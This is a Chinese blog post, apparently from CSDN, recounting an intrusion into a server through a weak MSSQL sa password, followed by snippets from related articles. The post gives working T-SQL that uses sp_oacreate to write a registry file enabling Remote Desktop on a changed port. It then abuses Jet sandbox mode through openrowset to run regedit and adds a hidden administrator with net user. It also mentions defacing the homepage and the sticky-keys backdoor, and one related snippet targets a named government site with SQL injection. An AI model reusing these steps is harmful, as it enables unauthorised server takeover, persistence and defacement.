【第22期】观点:IT 行业加班,到底有没有价值?

记一次基于mssql的入侵

原创 2016年09月01日 10:00:07

通过扫描发现目标机器mssql的sa存在弱口令;

上xp_cmdshell,没有结果;

上xp_dirtree看目录结构,定位web目录,修改主页;

难道就到此了吗?不,继续;

发现3389端口未开,写注册表文件开通3389

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\mstsc.reg', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Windows Registry Editor Version 5.00'
exec @ret = sp_oamethod @f, 'writeline', NULL,'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]'
exec @ret = sp_oamethod @f, 'writeline', NULL,'"fDenyTSConnections"=dword:00000000'
exec @ret = sp_oamethod @f, 'writeline', NULL,'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]'
exec @ret = sp_oamethod @f, 'writeline', NULL,'"PortNumber"=dword:00000d3d'
exec @ret = sp_oamethod @f, 'writeline', NULL,'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]'
exec @ret = sp_oamethod @f, 'writeline', NULL,'"PortNumber"=dword:00000d3d'

沙盒执行mstsc.reg,导入注册表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("regedit /s d:\mstsc.reg")')

顺便加个用户net user username userpwd /add, 加入管理员组net localgroup administrators username /add;

启动mstsc,尝试登录,看到如下画面:


算了,不登陆了;

使用5个shift漏洞,shift点5下,开始浏览文件






版权声明:本文为博主原创文章,未经博主允许不得转载。 举报

相关文章推荐

Sql Server中用Print命令轻松调试【存储过程】的技巧或经验!

Sql Server中用Print命令轻松调试【存储过程】的技巧或经验! 经常为存储过程的调试犯愁,通过不断的调试,终于找到一个简单的方法: 1、在存储过程中,用【print】输出,来判断错误问题...

mssql手工注入

报错注入: 例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixu...

MSSQL 刷新全数据库视图 脚本

/****** Object: StoredProcedure SYS_REFRESHVIEW Script Date: 12/17/2012 10:32:46 ******/ IF EXI...

MSSQL提取汉字

-->Title:生成測試數據-->Author:wufeng4552-->Date :2009-09-21 09:02:08--unicode从19968到40868if object_id(dbo...

sqlserver里存储过程执行时间差的打印

declare @now31 DateTime set @now31=getdate()   exec sp_executesql @sCondition,N'@sValueConditio...

记一次阿里云上Redis服务器被入侵的经历

欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和...

Google hacker

Google hacker (Google黑客)是利用GOOGLE提供的搜索功能查找黑客们想找到的信息.一般是查找网站后台,网管的个人信息,也可以用来查找某人在网络上的活动.   Google hacker 一般是做为黑客在入侵时的一个手段.在入侵过程中有时需要查找后台的登陆口就需要用到GOOGLE HACKER.有时猜解密码的时候google也是提供查找管理员资料的有效平台.   Google hacker的入侵方法(来自网络):   http://blog.dianfu.org/blogview.asp?logID=44&cateID=2   route print 查看本机设置网

Serv-U权限提升再提升--记一次虚拟主机入侵

作者:intruder来源:邪恶八进制中国自从Serv-U本地权限提升漏洞出来以后,大家手握Su.exe这把网兜逢鸡就罩,一时间的肉鸡明显增多、质量直线上升啊。特别《Win2000虚拟主机入侵大法》中...
  • psyl
  • psyl
  • 2005-02-22 21:42
  • 1187

Serv-U权限提升再提升--记一次虚拟主机入侵

作者:intruder来源:邪恶八进制中国 自从Serv-U本地权限提升漏洞出来以后,大家手握Su.exe这把网兜逢鸡就罩,一时间的肉鸡明显增多、质量直线上升啊。特别《Win2000虚拟主机入侵大法》中的方法流传

记一次云服务器被入侵

这次入侵发生在半年前,那时候还没建立CSDN,今天记录一下.服务器:腾讯云学生机 Centos6.x 1核 1GB 1MbpsWordpress最近爆出漏洞,不少用户遭到攻击. 这是发生在我主机...
  • Co_zy
  • Co_zy
  • 2017-07-14 17:42
  • 194
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)